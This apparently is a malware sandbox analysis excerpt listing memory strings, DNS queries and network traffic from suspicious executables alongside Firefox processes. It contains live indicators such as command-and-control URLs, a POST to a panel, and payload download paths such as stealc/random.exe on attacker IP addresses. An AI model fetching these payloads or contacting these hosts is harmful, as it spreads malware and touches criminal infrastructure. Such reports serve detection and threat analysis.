Source: firefox.exe, 00000023.00000002.2942352042.00000286233A2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: MOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/account+ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.2643663526.000001F414100000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: MOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/account_ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000023.00000002.3324817796.000002863136A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: PORTER_RESTART_ARG_1=https://www.youtube.com/accountMOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:\Program Files\Mozilla Firefox\browser\crashreporter-override.iniNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files\Mozilla Firefox;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=CKK equals www.youtube.com (Youtube)
Source: 1c593ec106.exe, 00000009.00000002.2967483473.0000000006699000.00000004.00000020.00020000.00000000.sdmp, 1c593ec106.exe, 0000000C.00000002.2966270641.000000000673D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 00000023.00000002.3108413567.000002862DA5C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["script"], urls:["*://webcompat-addon-testbed.herokuapp.com/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "*://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js*", "*://track.adform.net/serving/scripts/trackpoint/", "*://track.adform.net/serving/scripts/trackpoint/async/", "*://*.adnxs.com/*/ast.js*", "*://*.adnxs.com/*/pb.js*", "*://*.adnxs.com/*/prebid*", "*://www.everestjs.net/static/st.v3.js*", "*://static.adsafeprotected.com/vans-adapter-google-ima.js", "*://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "*://cdn.branch.io/branch-latest.min.js*", "*://pub.doubleverify.com/signals/pub.js*", "*://c.amazon-adsystem.com/aax2/apstag.js", "*://auth.9c9media.ca/auth/main.js", "*://static.chartbeat.com/js/chartbeat.js", "*://static.chartbeat.com/js/chartbeat_video.js", "*://static.criteo.net/js/ld/publishertag.js", "*://*.imgur.com/js/vendor.*.bundle.js", "*://*.imgur.io/js/vendor.*.bundle.js", "*://www.rva311.com/static/js/main.*.chunk.js", "*://web-assets.toggl.com/app/assets/scripts/*.js", "*://libs.coremetrics.com/eluminate.js", "*://connect.facebook.net/*/sdk.js*", "*://connect.facebook.net/*/all.js*", "*://secure.cdn.fastclick.net/js/cnvr-launcher/*/launcher-stub.min.js*", "*://www.google-analytics.com/analytics.js*", "*://www.google-analytics.com/gtm/js*", "*://www.googletagmanager.com/gtm.js*", "*://www.google-analytics.com/plugins/ua/ec.js", "*://ssl.google-analytics.com/ga.js", "*://s0.2mdn.net/instream/html5/ima3.js", "*://imasdk.googleapis.com/js/sdkloader/ima3.js", 
"*://www.googleadservices.com/pagead/conversion_async.js", "*://www.googletagservices.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/gpt/pubads_impl_*.js*", "*://securepubads.g.doubleclick.net/tag/js/gpt.js*", "*://securepubads.g.doubleclick.net/gpt/pubads_impl_*.js*", "*://script.ioam.de/iam.js", "*://cdn.adsafeprotected.com/iasPET.1.js", "*://static.adsafeprotected.com/iasPET.1.js", "*://adservex.media.net/videoAds.js*", "*://*.moatads.com/*/moatad.js*", "*://*.moatads.com/*/moatapi.js*", "*://*.moatads.com/*/moatheader.js*", "*://*.moatads.com/*/yi.js*", "*://*.imrworldwide.com/v60.js", "*://cdn.optimizely.com/js/*.js", "*://cdn.optimizely.com/public/*.js", "*://id.rambler.ru/rambler-id-helper/auth_events.js", "*://media.richrelevance.com/rrserver/js/1.2/p13n.js", "*://www.gstatic.com/firebasejs/*/firebase-messaging.js*", "*://*.vidible.tv/*/vidible-min.js*", "*://vdb-cdn-files.s3.amazonaws.com/*/vidible-min.js*", "*://js.maxmind.com/js/apis/geoip2/*/geoip2.js", "*://s.webtrends.com/js/advancedLinkTracking.js", "*://s.webtrends.com/js/webtrends.js", "*://s.webtrends.com/js/webtrends.min.js"], windowId
Source: firefox.exe, 00000023.00000002.3358002708.0000028632E49000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: about:certerror?e=nssBadCert&u=https%3A//www.youtube.com/account&c=UTF-8&d=%20 equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.2643811635.000001F414170000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: aming\Mozilla\Firefox\Pending PingsMOZ_CRASHREPORTER_RESTART_ARG_0=C:\Program Files\Mozilla Firefox\firefox.exeMOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/accountMOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:\Program Files\Mozilla Firefox\bro equals www.youtube.com (Youtube)
Source: firefox.exe, 00000023.00000002.3324817796.0000028631391000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: detectportal.prod.mozaws.netPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCMOZ_CRASHREPORTER_DATA_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Crash ReportsMOZ_CRASHREPORTER_EVENTS_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\eventsMOZ_CRASHREPORTER_PING_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Pending PingsMOZ_CRASHREPORTER_RESTART_ARG_0=C:\Program Files\Mozilla Firefox\firefox.exeMOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/accountMOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:\Program Files\Mozilla Firefox\browser\crashreporter-override.iniNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files\Mozilla Firefox;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOM equals www.youtube.com (Youtube)
Source: firefox.exe, 00000018.00000002.2631652987.00000238F387B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: devtools.performance.recording.ui-base-urldevtools/client/framework/devtools-browser@mozilla.org/uriloader/handler-service;1^([a-z][a-z0-9.+\t-]*)(:|;)?(\/\/)?devtools.debugger.remote-websocketbrowser.fixup.domainsuffixwhitelist.Got invalid request to save JSON dataresource://devtools/server/devtools-server.jsUnable to start devtools server on get FIXUP_FLAG_ALLOW_KEYWORD_LOOKUPget FIXUP_FLAGS_MAKE_ALTERNATE_URIFailed to listen. Listener already attached.get FIXUP_FLAG_FORCE_ALTERNATE_URI@mozilla.org/network/protocol;1?name=filereleaseDistinctSystemPrincipalLoaderNo callback set for this channel.@mozilla.org/network/protocol;1?name=default@mozilla.org/dom/slow-script-debug;1browser.fixup.dns_first_for_single_words{9e9a9283-0ce9-4e4a-8f1c-ba129a032c32}WebChannel/this._originCheckCallbackJSON Viewer's onSave failed in startPersistence^([a-z+.-]+:\/{0,3})*([^\/@]+@).+Failed to listen. 
Callback argument missing.devtools.performance.popup.feature-flagdevtools/client/framework/devtoolsFailed to execute WebChannel callback:^[a-z0-9-]+(\.[a-z0-9-]+)*:[0-9]{1,5}([/?#]|$)DevToolsStartup.jsm:handleDebuggerFlagDevTools telemetry entry point failed: resource://devtools/shared/security/socket.jsbrowser.urlbar.dnsResolveFullyQualifiedNamesresource://gre/modules/ExtHandlerService.sys.mjs{c6cf88b7-452e-47eb-bdc9-86e3561648ef}resource://gre/modules/URIFixup.sys.mjs@mozilla.org/network/async-stream-copier;1http://www.inbox.lv/rfc2368/?value=%shttps://e.mail.ru/cgi-bin/sentmsg?mailto=%sresource://gre/modules/FileUtils.sys.mjsresource://gre/modules/JSONFile.sys.mjsresource://gre/modules/NetUtil.sys.mjs{33d75835-722f-42c0-89cc-44f328e56a86}resource://gre/modules/FileUtils.sys.mjs_finalizeInternal/this._finalizePromise<extractScheme/fixupChangedProtocol<@mozilla.org/uriloader/local-handler-app;1@mozilla.org/uriloader/web-handler-app;1http://compose.mail.yahoo.co.jp/ym/Compose?To=%shandlerSvc fillHandlerInfo: don't know this typeresource://gre/modules/DeferredTask.sys.mjsresource://gre/modules/JSONFile.sys.mjshttps://mail.inbox.lv/compose?to=%s@mozilla.org/uriloader/dbus-handler-app;1Scheme should be either http or https_injectDefaultProtocolHandlersIfNeededhttp://win.mail.ru/cgi-bin/sentmsg?mailto=%s@mozilla.org/network/file-input-stream;1Can't invoke URIFixup in the content processgecko.handlerService.defaultHandlersVersionhttps://mail.yahoo.co.jp/compose/?To=%shttp://poczta.interia.pl/mh/?mailto=%shttps://poczta.interia.pl/mh/?mailto=%sisDownloadsImprovementsAlreadyMigratedresource://gre/modules/DeferredTask.sys.mjs@mozilla.org/network/input-stream-pump;1SEC_ALLOW_CROSS_ORIGIN_SEC_CONTEXT_IS_NULLhttps://mail.yahoo.co.jp/compose/?To=%shttps://mail.yandex.ru/compose?mailto=%s@mozilla.org/network/simple-stream-listener;1First argument should be an nsIInputStreamNon-zero amount of bytes must be 
specifiedhttps://e.mail.ru/cgi-bin/sentmsg?mailto=%shttps://poczta.interia.pl/mh/?mailto=%snewChannel requires a single object argumenthttps://mail.inbox.lv/compose?to=%spdfjs.pre
Source: firefox.exe, 00000018.00000002.2631652987.00000238F3815000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: dom.sitepermsaddon-provider.enabledonPrefEnabledChanged() - adding gmp directory onPrefEMEGlobalEnabledChanged() id= - the given reason to update is not supportedmedia.gmp-manager.secondsBetweenChecksipc:first-content-process-createdstartup - adding clearkey CDM failedfindUpdates() - found update for This should only be called from XPCShell testsstartup - adding gmp directory failed with startup - adding clearkey CDM directory webcompat-reporter@mozilla.org.xpiFileUtils_openSafeFileOutputStreamwebcompat-reporter%40mozilla.org:1.5.1FileUtils_closeSafeFileOutputStream@mozilla.org/network/file-output-stream;1resource://gre/modules/addons/XPIProvider.jsmhttps://smartblock.firefox.etp/facebook.svghttps://smartblock.firefox.etp/play.svg*://track.adform.net/serving/scripts/trackpoint/*://c.amazon-adsystem.com/aax2/apstag.js*://cdn.branch.io/branch-latest.min.js**://auth.9c9media.ca/auth/main.js*://static.chartbeat.com/js/chartbeat.jspictureinpicture%40mozilla.org:1.0.0@mozilla.org/network/atomic-file-output-stream;1@mozilla.org/addons/addon-manager-startup;1*://static.criteo.net/js/ld/publishertag.jsFileUtils_openAtomicFileOutputStream*://*.imgur.io/js/vendor.*.bundle.js*://www.everestjs.net/static/st.v3.js*@mozilla.org/network/safe-file-output-stream;1*://pub.doubleverify.com/signals/pub.js**://www.rva311.com/static/js/main.*.chunk.js*://web-assets.toggl.com/app/assets/scripts/*.js*://connect.facebook.net/*/sdk.js**://static.chartbeat.com/js/chartbeat_video.js*://connect.facebook.net/*/all.js*resource://gre/modules/FileUtils.sys.mjs*://libs.coremetrics.com/eluminate.js*://*.imgur.com/js/vendor.*.bundle.jsresource://gre/modules/AsyncShutdown.sys.mjs equals www.facebook.com (Facebook)
Source: firefox.exe, 00000018.00000002.2631652987.00000238F387B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: get serviceWorkersTestingEnabledhttps://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 00000023.00000002.3324817796.0000028631391000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: gram Fles\Mozilla Firefox\firefox.exeMOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/accountMOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:\Program Files\Mozilla Firefox\browser\crashreport equals www.youtube.com (Youtube)
Source: firefox.exe, 00000023.00000002.3168184572.000002862DC6D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000023.00000002.3168184572.000002862DC6D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000023.00000002.3168184572.000002862DC6D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: 1c593ec106.exe, 00000009.00000002.2964260464.0000000006630000.00000004.00000020.00020000.00000000.sdmp, 1c593ec106.exe, 0000000C.00000002.2961150668.00000000066D2000.00000004.00000020.00020000.00000000.sdmp, 1c593ec106.exe, 0000000C.00000002.2941021583.000000000240C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: 1c593ec106.exe, 00000009.00000002.2964260464.0000000006630000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/account7 equals www.youtube.com (Youtube)
Source: 1c593ec106.exe, 00000009.00000002.2964260464.0000000006630000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/account= equals www.youtube.com (Youtube)
Source: 1c593ec106.exe, 0000001F.00000002.2963560119.0000000006D92000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/account>mJ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000023.00000002.2938979510.0000028621A03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/account@ equals www.youtube.com (Youtube)
Source: 1c593ec106.exe, 00000009.00000002.2964260464.0000000006630000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accountI equals www.youtube.com (Youtube)
Source: 1c593ec106.exe, 0000000C.00000002.2961150668.00000000066D2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accountQ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000018.00000002.2625566496.00000238E7603000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/account` equals www.youtube.com (Youtube)
Source: firefox.exe, 00000023.00000002.3338983377.000002863207E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accountmain/nimbus-desktop-experimentsmain/nimbus-desktop-experimentsupgrade-spotlight-rolloutserp-ad-telemetry-rollouthttpSpeculativeParallelLimitmain/nimbus-desktop-experimentsINVALID_SHAREABLE_SCHEMES equals www.youtube.com (Youtube)
Source: 1c593ec106.exe, 0000000C.00000002.2961150668.00000000066D2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accountt equals www.youtube.com (Youtube)
Source: 1c593ec106.exe, 00000009.00000002.2964260464.0000000006630000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accountw equals www.youtube.com (Youtube)
Source: 1c593ec106.exe, 00000009.00000002.2939170613.00000000021CA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/account} equals www.youtube.com (Youtube)
Source: firefox.exe, 00000015.00000003.2579353074.000001CBE7979000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000015.00000003.2578648250.000001CBE796C000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2581052147.000001CBE797A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: s://www.youtube.com/account --attempting-deelevation equals www.youtube.com (Youtube)
Source: firefox.exe, 00000018.00000002.2631652987.00000238F387B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: set suspendMediaWhenInactivehttps://www.youtube.com/accountbrowser-delayed-startup-finishedauthorStyleDisabledDefaultresetLocationChangeRateLimitget authorStyleDisabledDefaultbrowsing-context-discardedset authorStyleDisabledDefaultserviceWorkersTestingEnabledgetAllBrowsingContextsInSubtreeget serviceWorkersTestingEnabledhttps://www.youtube.com/accounttoolkit.singletonWindowType_downloadTypesViewableInternally_shouldViewDownloadInternally/<getMostRecentBrowserWindowpreviousHandler.preferredAction.PREF_BRANCH_PREVIOUS_ACTIONgetCurrentInnerWindowWithIdhttps://www.youtube.com/account@mozilla.org/browser/clh;1PREF_BRANCH_WAS_REGISTEREDnotifyStartDelayedAutoplayMediawebcompat-reporter@mozilla.orgWeb Compatibility Interventions equals www.youtube.com (Youtube)
Source: firefox.exe, 00000023.00000002.3338983377.000002863207E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: toolkit/global/browser-utils.ftlhttp://www.w3.org/1999/xlinkSERP Ad Telemetry RollouthttpSpeculativeParallelLimithttpSpeculativeParallelLimitmain/nimbus-desktop-experimentsfirefox-desktop-urlbar-release-9main/nimbus-desktop-experimentsmain/nimbus-desktop-experimentszero-prefix-weather-suggestionsmain/nimbus-desktop-experimentsmain/nimbus-desktop-experimentshttps://www.youtube.com/accountmain/nimbus-desktop-experimentsserp-ad-telemetry-rolloutzero-prefix-weather-suggestions equals www.youtube.com (Youtube)
Source: firefox.exe, 00000018.00000002.2640278303.000033E224400000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.youtube.com equals www.youtube.com (Youtube)
Source: firefox.exe, 00000018.00000002.2640278303.000033E224400000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 00000018.00000002.2640278303.000033E224400000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.youtube.com/accountZ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000023.00000002.3334627067.0000028631DB0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: x*://www.facebook.com/platform/impression.php* equals www.facebook.com (Facebook)
Source: firefox.exe, 00000023.00000002.3358002708.0000028632E49000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: x.S........[tlsflags0x00000000]www.youtube.com:443^partitionKey=%28https%2Cyoutube.com%29 equals www.youtube.com (Youtube)
Source: firefox.exe, 00000023.00000002.3358002708.0000028632E49000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: xabout:certerror?e=nssBadCert&u=https%3A//www.youtube.com/account&c=UTF-8&d=%20 equals www.youtube.com (Youtube)
Source: firefox.exe, 00000018.00000002.2630851621.00000238F37C9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2630851621.00000238F3769000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2598025146.00000238F3769000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: xhttps://www.youtube.com/account equals www.youtube.com (Youtube)
Source: global traffic DNS traffic detected: DNS query: prod.classify-client.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: www.youtube.com
Source: global traffic DNS traffic detected: DNS query: detectportal.firefox.com
Source: global traffic DNS traffic detected: DNS query: prod.detectportal.prod.cloudops.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: youtube-ui.l.google.com
Source: global traffic DNS traffic detected: DNS query: example.org
Source: global traffic DNS traffic detected: DNS query: ipv4only.arpa
Source: global traffic DNS traffic detected: DNS query: contile.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: spocs.getpocket.com
Source: global traffic DNS traffic detected: DNS query: prod.ads.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: content-signature-2.cdn.mozilla.net
Source: global traffic DNS traffic detected: DNS query: prod.content-signature-chains.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: prod.balrog.prod.cloudops.mozgcp.net
Source: unknown HTTP traffic detected:
    POST /Vi9leo/index.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 185.215.113.19
    Content-Length: 4
    Cache-Control: no-cache
    Data Raw: 73 74 3d 73
    Data Ascii: st=s
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.2625566496.00000238E7667000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: http://127.0.0.1:
Source: 8ec8c5c339.exe, 00000008.00000002.2741806930.0000000002515000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/mine/random.exe
Source: 8ec8c5c339.exe, 00000008.00000002.2741806930.0000000002515000.00000004.00000020.00020000.00000000.sdmp, 8ec8c5c339.exe, 00000008.00000002.2772437100.0000000028B15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/soka/random.exe
Source: 8ec8c5c339.exe, 00000008.00000002.2741806930.0000000002515000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/soka/random.exeN
Source: explorti.exe, 00000007.00000002.2926586035.0000000000DAF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/stealc/random.exe
Source: explorti.exe, 00000007.00000002.2926586035.0000000000DAF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/stealc/random.execodediD
Source: explorti.exe, 00000007.00000002.2926586035.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/well/random.exe
Source: explorti.exe, 00000007.00000002.2926586035.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/
Source: explorti.exe, 00000007.00000002.2926586035.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Local
Source: explorti.exe, 00000007.00000002.2926586035.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.php
Source: explorti.exe, 00000007.00000002.2926586035.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.php(
Source: explorti.exe, 00000007.00000002.2926586035.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.php1
Source: explorti.exe, 00000007.00000002.2926586035.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.php17001
Source: explorti.exe, 00000007.00000002.2926586035.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.php2
Source: explorti.exe, 00000007.00000002.2926586035.0000000000DAF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.php:N
Source: explorti.exe, 00000007.00000002.2926586035.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpM:S
Source: explorti.exe, 00000007.00000002.2926586035.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpl
Source: explorti.exe, 00000007.00000002.2926586035.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.phplh
Source: explorti.exe, 00000007.00000002.2926586035.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpp
Source: explorti.exe, 00000007.00000002.2926586035.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpta
Source: explorti.exe, 00000007.00000002.2926586035.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/ViewSizePreferences.SourceAumid
Source: explorti.exe, 00000007.00000002.2926586035.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/fac00b58987e8fcf7b8c730804042ba5ce902415450#=
Source: 8ec8c5c339.exe, 00000008.00000002.2738630098.000000000043C000.00000040.00000001.01000000.00000009.sdmp, 8ec8c5c339.exe, 0000000A.00000002.2721852651.00000000025EA000.00000004.00000020.00020000.00000000.sdmp, 8ec8c5c339.exe, 0000000A.00000002.2721852651.0000000002621000.00000004.00000020.00020000.00000000.sdmp, 8ec8c5c339.exe, 0000001E.00000002.2782069458.00000000026DA000.00000004.00000020.00020000.00000000.sdmp, 8ec8c5c339.exe, 0000001E.00000002.2781993331.00000000026C0000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31
Source: 8ec8c5c339.exe, 0000000A.00000002.2721852651.0000000002621000.00000004.00000020.00020000.00000000.sdmp, 8ec8c5c339.exe, 0000001E.00000002.2782069458.00000000026DA000.00000004.00000020.00020000.00000000.sdmp, 8ec8c5c339.exe, 0000001E.00000002.2782069458.0000000002710000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/
Source: 8ec8c5c339.exe, 0000000A.00000002.2721852651.0000000002621000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/3w
Source: 8ec8c5c339.exe, 0000001E.00000002.2782069458.0000000002710000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.php
Source: 8ec8c5c339.exe, 0000000A.00000002.2721852651.0000000002621000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.php-w6
Source: 8ec8c5c339.exe, 0000001E.00000002.2782069458.0000000002710000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.php.?i
Source: 8ec8c5c339.exe, 00000008.00000002.2741806930.0000000002515000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.php6
Source: 8ec8c5c339.exe, 0000001E.00000002.2782069458.0000000002710000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpA
Source: 8ec8c5c339.exe, 00000008.00000002.2741806930.0000000002515000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpE
Source: 8ec8c5c339.exe, 00000008.00000002.2772437100.0000000028B0C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpJ
Source: 8ec8c5c339.exe, 0000001E.00000002.2782069458.00000000026DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpQ
Source: 8ec8c5c339.exe, 00000008.00000002.2772437100.0000000028B15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpSQ
Source: 8ec8c5c339.exe, 0000001E.00000002.2782069458.0000000002710000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpV?
Source: 8ec8c5c339.exe, 0000001E.00000002.2782069458.00000000026DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpZ
Source: 8ec8c5c339.exe, 00000008.00000002.2741806930.00000000024C7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpa
Source: 8ec8c5c339.exe, 00000008.00000002.2741806930.0000000002515000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpaY
Source: 8ec8c5c339.exe, 00000008.00000002.2741806930.0000000002515000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpb
